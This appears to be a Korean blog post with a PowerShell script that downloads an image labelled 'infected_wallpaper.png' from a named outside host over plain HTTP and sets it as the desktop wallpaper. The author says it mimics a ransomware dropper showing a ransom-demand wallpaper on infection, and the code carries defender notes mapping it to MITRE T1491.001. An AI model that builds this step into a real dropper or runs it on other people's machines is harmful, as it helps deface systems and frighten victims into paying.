[Windows] Powershell 배경화면 바꾸기 본문
# setting wallpaper function
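function Set-WallPaper {
    <#
    .SYNOPSIS
    Sets the current user's desktop wallpaper and, optionally, its display style.

    .DESCRIPTION
    When -Style is supplied, writes WallpaperStyle and TileWallpaper under
    HKCU:\Control Panel\Desktop, then calls user32!SystemParametersInfo with
    SPI_SETDESKWALLPAPER so the change is saved to the user profile and
    broadcast to running applications.

    Defender note: a wallpaper change made by a script is the behaviour
    catalogued as MITRE ATT&CK T1491.001 (Internal Defacement). The registry
    value writes under HKCU\Control Panel\Desktop and the runtime C#
    compilation done by Add-Type (Windows PowerShell 5.1 invokes csc.exe for
    this) are both observable in endpoint telemetry.

    .PARAMETER Image
    Path to the image file to use as wallpaper. Must exist.

    .PARAMETER Style
    Optional display style. When omitted, the existing style values in the
    registry are left untouched.
    #>
    param (
        [parameter(Mandatory=$True)]
        # Provide path to image
        [string]$Image,
        # Provide wallpaper style that you would like applied
        [parameter(Mandatory=$False)]
        [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
        [string]$Style
    )

    # Fail before touching the registry so a bad path does not leave the
    # style values changed with no wallpaper applied.
    if (-not (Test-Path -LiteralPath $Image -PathType Leaf)) {
        Write-Error "Image file not found: $Image"
        return
    }

    # Only write the style values when the caller asked for a style; without
    # this guard an omitted -Style wrote an empty WallpaperStyle value.
    if ($PSBoundParameters.ContainsKey('Style')) {
        $WallpaperStyle = Switch ($Style) {
            "Fill"    {"10"}
            "Fit"     {"6"}
            "Stretch" {"2"}
            "Tile"    {"0"}
            "Center"  {"0"}
            "Span"    {"22"}
        }
        # Tile and Center share WallpaperStyle 0; TileWallpaper tells them apart.
        $TileWallpaper = if ($Style -eq "Tile") { 1 } else { 0 }

        New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
        New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value $TileWallpaper -Force
    }

    $temp =
@"
using System;
using System.Runtime.InteropServices;
public class Params
{
[DllImport("User32.dll",CharSet=CharSet.Unicode)]
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
}
"@
    # Skip compilation when the type is already loaded in this session.
    if (-not ('Params' -as [type])) {
        Add-Type -TypeDefinition $temp
    }

    $SPI_SETDESKWALLPAPER = 0x0014
    $UpdateIniFile = 0x01      # SPIF_UPDATEINIFILE: persist to the user profile
    $SendChangeEvent = 0x02    # SPIF_SENDCHANGE: broadcast WM_SETTINGCHANGE
    $fWinIni = $UpdateIniFile -bor $SendChangeEvent

    # SystemParametersInfo returns zero on failure; surface it instead of
    # silently discarding the result.
    $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
    if ($ret -eq 0) {
        Write-Error "SystemParametersInfo(SPI_SETDESKWALLPAPER) failed for: $Image"
    }
}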
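# download wallpaper
# NOTE(review): the URL is plain HTTP and the file is used without any
# integrity check, so the content is whatever the network path returns.
# Defender note: a PowerShell process that makes an outbound web request,
# writes an image under %TEMP% and then changes the wallpaper is a sequence
# worth alerting on (see MITRE ATT&CK T1491.001, Internal Defacement).
$downloadURL = "http://bpsec.co.kr/~minibeef/download/infected_wallpaper.png"
$path = Join-Path -Path $env:TEMP -ChildPath "infected_wallpaper.png"

# $client was used without being created anywhere in this listing.
$client = New-Object System.Net.WebClient
try {
    $client.DownloadFile($downloadURL, $path)
}
finally {
    $client.Dispose()
}

# setting wallpaper
# Reuse $path rather than rebuilding the file name from $env:TEMP next to a
# quoted string, which depends on how argument-mode parsing joins the two.
Set-WallPaper -Image $path -Style Fit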
랜섬웨어가 악성행위 후 wallpaper를 변경하여 피해자에게 금액을 요구하는 시나리오를 가정, dropper를 실행했을 때 감염 행동과 동시에 wallpaper가 적용되도록 만들어봤다.